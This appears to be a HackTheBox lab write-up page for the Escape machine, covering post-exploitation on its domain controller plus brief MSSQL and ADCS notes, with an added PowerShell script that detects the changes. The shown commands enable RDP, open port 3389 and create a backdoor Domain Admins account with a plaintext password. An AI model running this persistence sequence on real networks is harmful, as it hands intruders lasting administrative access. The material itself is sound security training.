Beyond
This is the beyond page, where additional post-exploitation enumeration and assessment are conducted as the root user after compromising the target system.
c:\Windows\system32> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
The operation completed successfully.
c:\Windows\system32> netsh firewall add portopening TCP 3389 "Remote Desktop"
important: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at https://go.microsoft.com/fwlink/?linkid=121488 .
Ok.
Starting the RDP service and opening up port 3389
c:\Windows\system32> net user /ADD /Domain exec Qwer1234
The command completed successfully.
c:\Windows\system32> net groups /ADD /Domain "Domain Admins" exec
The command completed successfully.
c:\Windows\system32> net groups "Domain Admins"
Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
Administrator exec
The command completed successfully.
Creating an admin user: exec
┌──(kali㉿kali)-[~/…/htb/labs/escape/ADCS]
└─$ xfreerdp /u:exec /p:Qwer1234 /v:dc.sequel.htb /cert:ignore /dynamic-resolution /tls-seclevel:0
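As an added example (not from the original writeup), these are the checks a defender would run on the domain controller to spot the three changes made above: RDP enabled through fDenyTSConnections, an inbound allow rule for TCP/3389, and an unexpected member of Domain Admins. It assumes an elevated PowerShell session on the host and the ActiveDirectory RSAT module; $KnownAdmins is an assumed allow-list you maintain yourself.

```powershell
# Added example, not code from the original writeup. Run elevated on the DC.
# Assumption: $KnownAdmins lists the accounts that are expected in Domain Admins.
$KnownAdmins = @('Administrator')

# 1. Is RDP enabled? fDenyTSConnections = 0 means incoming connections are allowed.
$ts = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' `
                       -Name fDenyTSConnections -ErrorAction SilentlyContinue
if ($ts -and $ts.fDenyTSConnections -eq 0) {
    Write-Warning "RDP is enabled (fDenyTSConnections = 0); confirm this is expected on a DC."
} else {
    Write-Output "RDP is disabled (fDenyTSConnections is 1 or unset)."
}

# 2. Which enabled inbound rules allow TCP/3389? The legacy 'netsh firewall add portopening'
#    still creates a rule in the advanced firewall, so it is visible here as well.
$rules = Get-NetFirewallPortFilter -Protocol TCP |
         Where-Object { $_.LocalPort -eq 3389 } |
         Get-NetFirewallRule |
         Where-Object { $_.Enabled -eq 'True' -and $_.Direction -eq 'Inbound' -and $_.Action -eq 'Allow' }
foreach ($r in $rules) {
    Write-Output ("Inbound allow rule for TCP/3389: '{0}' (DisplayName '{1}')" -f $r.Name, $r.DisplayName)
}

# 3. Who is in Domain Admins (including nested groups), and who is not on the allow-list?
#    In the Security log, 4720 (user created) followed by 4728 (member added to a
#    security-enabled global group) is the trail the 'net user' / 'net group' pair leaves.
Import-Module ActiveDirectory -ErrorAction Stop
$members    = Get-ADGroupMember -Identity 'Domain Admins' -Recursive |
              Select-Object -ExpandProperty SamAccountName
$unexpected = $members | Where-Object { $KnownAdmins -notcontains $_ }
if ($unexpected) {
    Write-Warning ("Unexpected Domain Admins members: " + ($unexpected -join ', '))
    foreach ($u in $unexpected) {
        # whenCreated separates a freshly added account from a long-standing one
        Get-ADUser -Identity $u -Properties whenCreated, LastLogonDate |
            Select-Object SamAccountName, whenCreated, LastLogonDate
    }
} else {
    Write-Output "Domain Admins membership matches the allow-list."
}
```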
MSSQL
┌──(kali㉿kali)-[~/archive/htb/labs/escape]
└─$ wget -q https://aka.ms/ssmsfullsetup
*Evil-WinRM* PS C:\Users\exec\Desktop> copy \\10.10.14.20\smb\SSMS-Setup-ENU.exe .
There are only 2 users: sa, the default sysadmin, and BUILTIN\Users, which covers anyone who authenticates with Windows credentials.
The server role is set to public for BUILTIN\Users. This indicates that members of the BUILTIN\Users group are allowed to connect to the SQL Server instance.
ADCS
The last 4 must be me.
I cannot see the security property here.
MMC to the rescue.
Everything is set to Deny for the sql_svc user.
This is why I was initially unable to enumerate the AD templates earlier.